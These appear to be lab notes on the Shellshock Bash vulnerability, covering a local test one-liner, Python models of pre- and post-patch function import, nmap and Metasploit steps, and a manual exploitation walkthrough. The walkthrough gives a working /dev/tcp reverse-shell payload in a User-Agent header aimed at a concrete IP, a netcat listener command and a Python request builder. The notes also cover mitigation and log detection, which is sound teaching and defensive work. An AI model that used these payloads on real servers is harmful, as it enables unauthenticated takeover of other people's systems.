- Shellshock (CVE-2014-6271) is a severe vulnerability in GNU Bash, disclosed in September 2014.
- It lets attackers run arbitrary commands by supplying a crafted environment variable to any process that starts Bash.
- Example check on a local host:
  env VAR='() { :; }; echo pwned' bash -c "echo test"
  A vulnerable Bash prints "pwned" before "test"; a patched Bash prints only "test".
- Web servers running CGI scripts were prime targets, because CGI copies request headers such as User-Agent into environment variables of the script, and the attacker controls those headers.
- Bash imported any environment variable whose value began with "() {" as a function definition and, because it kept parsing past the closing brace, executed whatever commands followed it.
- Result: unauthenticated remote code execution and full system compromise.
- Mitigation: upgrade Bash (the first patch was incomplete and was followed by CVE-2014-7169, so make sure the later fixes are applied too) and never pass untrusted input into the environment of shell processes.
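To make the mechanism in the notes above concrete, here is an added example (not part of the original notes, and not Bash source) that models in Python how Bash imported functions from the environment before and after the fix, scans a constructed CGI-style environment with both models, and runs the one-liner above against the local Bash. The sample environment, the variable names and the simplified brace matching are assumptions of the model.

```python
import shutil
import subprocess

# Constructed CGI-style environment (not from the lab): a web server has
# copied the request headers into HTTP_* variables for the script.
SAMPLE_ENV = {
    "HTTP_HOST": "victim.example",
    "HTTP_USER_AGENT": "() { :; }; echo pwned",
    "QUERY_STRING": "a=1",
}

FUNC_START = "() {"


def _body_end(value):
    """Index of the brace closing the '() { ... }' body, or -1.
    Brace counting only; real Bash also tracks quoting, which this model skips."""
    if not value.startswith(FUNC_START):
        return -1
    depth = 0
    for i in range(len("() "), len(value)):
        ch = value[i]
        if ch == "{":
            depth += 1
        elif ch == "}":
            depth -= 1
            if depth == 0:
                return i
    return -1


def vulnerable_import(name, value):
    """Model of the pre-patch import: any variable whose value starts with
    '() {' is taken as a function definition, and because the parser kept
    going after the closing brace, the remainder ran as ordinary commands."""
    end = _body_end(value)
    if end == -1:
        return None
    trailing = value[end + 1:].strip()
    if trailing.startswith(";"):
        trailing = trailing[1:].strip()
    return {"function": name, "executed": trailing}


def patched_import(name, value):
    """Model of the fixed import: only variables named BASH_FUNC_<name>%%
    are considered (upstream naming; some distributions backported with
    BASH_FUNC_<name>() instead), and the value must be exactly one function
    body, so trailing commands and every HTTP_* header are ignored."""
    if not (name.startswith("BASH_FUNC_") and name.endswith("%%")):
        return None
    end = _body_end(value)
    if end == -1 or value[end + 1:].strip():
        return None
    return {"function": name[len("BASH_FUNC_"):-2], "executed": ""}


def scan_environment(env, importer):
    """Return (variable, commands) pairs that the given importer would execute."""
    hits = []
    for name, value in env.items():
        parsed = importer(name, value)
        if parsed and parsed["executed"]:
            hits.append((name, parsed["executed"]))
    return hits


def local_bash_check():
    """Run the one-liner from the notes above against the real Bash on this host.
    True = vulnerable (prints 'pwned'), False = patched, None = no bash found."""
    bash = shutil.which("bash")
    if bash is None:
        return None
    try:
        out = subprocess.run([bash, "-c", "echo test"],
                             env={"VAR": "() { :; }; echo pwned", "PATH": "/usr/bin:/bin"},
                             capture_output=True, text=True, timeout=5).stdout
    except (OSError, subprocess.SubprocessError):
        return None
    return "pwned" in out


if __name__ == "__main__":
    print("pre-patch Bash would run:", scan_environment(SAMPLE_ENV, vulnerable_import))
    print("patched Bash would run:  ", scan_environment(SAMPLE_ENV, patched_import))
    print("this host's bash vulnerable:", local_bash_check())
```

The point of the two importers side by side is that the fix is not input sanitisation: the patched Bash simply refuses to treat an arbitrary variable as a function, so a header value that still starts with "() {" lands in HTTP_USER_AGENT as inert text.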
Shellshock lab
The first step is an nmap scan with the http-shellshock NSE script, pointed at the CGI path, to check whether the target is vulnerable (IP is the target host):
nmap -sV --script=http-shellshock --script-args="http-shellshock.uri=/gettime.cgi" IP
Then the vulnerability can be exploited easily with Metasploit: running search shellshock in msfconsole lists the relevant modules.
Manually Exploiting Shellshock
In this lab we also had to exploit Shellshock manually. Burp Suite was already configured, so we intercepted the traffic with Burp, made a request to the CGI script and sent it to Repeater.
In Repeater the payload goes into a request header that the CGI gateway forwards to the script as an environment variable (User-Agent is the usual choice). With a listener waiting on the attacking machine (for example nc -lvnp 1234), the following header value opens a reverse shell from the target:
() { :; }; echo; /bin/bash -i >& /dev/tcp/192.137.131.2/1234 0>&1
The general form, with the attacker's address and port substituted:
() { :; }; echo; /bin/bash -i >& /dev/tcp/IP/PORT 0>&1
The leading echo; emits the blank line that terminates the CGI response headers, so the web server treats the script output as a valid response, and /dev/tcp is a Bash pseudo-device, so no netcat is needed on the target.
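As an added example that is not part of the lab, the following Python builds the request sent from Repeater with the payload in the User-Agent header, shows how a CGI gateway turns that header into the HTTP_USER_AGENT variable that reaches Bash, and flags the same pattern in constructed access-log lines for the defender's side of the exercise. The hostname victim.example, the log lines and the IP/PORT placeholders are assumptions.

```python
import re

# Placeholders as used in the notes above, not a real target.
ATTACKER_IP = "IP"
ATTACKER_PORT = "PORT"


def build_payload(ip=ATTACKER_IP, port=ATTACKER_PORT):
    """The header value from the lab: a dummy function body, an echo that
    ends the CGI response headers, then a Bash /dev/tcp reverse shell."""
    return f"() {{ :; }}; echo; /bin/bash -i >& /dev/tcp/{ip}/{port} 0>&1"


def build_request(host, path, payload, header="User-Agent"):
    """Raw HTTP/1.1 request as it would be sent from Burp Repeater, with the
    payload carried in `header`."""
    return ("\r\n".join([
        f"GET {path} HTTP/1.1",
        f"Host: {host}",
        f"{header}: {payload}",
        "Connection: close",
    ]) + "\r\n\r\n")


def cgi_environment(raw_request):
    """How a CGI gateway (RFC 3875) hands the request to the script: every
    header becomes HTTP_<NAME> in the script's environment, which is the
    channel that carries the payload into Bash."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _ = request_line.split(" ", 2)
    path, _, query = target.partition("?")
    env = {"REQUEST_METHOD": method, "SCRIPT_NAME": path, "QUERY_STRING": query}
    for line in header_lines:
        name, _, value = line.partition(":")
        env["HTTP_" + name.strip().upper().replace("-", "_")] = value.strip()
    return env


# Detection: the function prefix is the signature; a production rule would
# also cover the variants that appeared after the first patch.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def is_shellshock_attempt(text):
    return bool(SHELLSHOCK_RE.search(text))


# Constructed Apache combined-format log lines (not from the lab).
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Sep/2014:10:01:02 +0000] "GET /gettime.cgi HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [24/Sep/2014:10:01:07 +0000] "GET /gettime.cgi HTTP/1.1" 200 0 "-" '
    '"() { :; }; echo; /bin/bash -i >& /dev/tcp/IP/PORT 0>&1"',
    '10.0.0.9 - - [24/Sep/2014:10:01:09 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "curl/7.38.0"',
]


def find_attempts(log_lines):
    return [line for line in log_lines if is_shellshock_attempt(line)]


if __name__ == "__main__":
    req = build_request("victim.example", "/gettime.cgi", build_payload())
    print(req)
    print("reaches Bash as HTTP_USER_AGENT =", cgi_environment(req)["HTTP_USER_AGENT"])
    for hit in find_attempts(SAMPLE_LOG):
        print("shellshock attempt:", hit)
```

Any header works as the carrier, so a detector that only inspects User-Agent is easy to bypass; the log scan above runs the regex over the whole line for that reason, and a web server that logs only the request line would miss the attempt entirely.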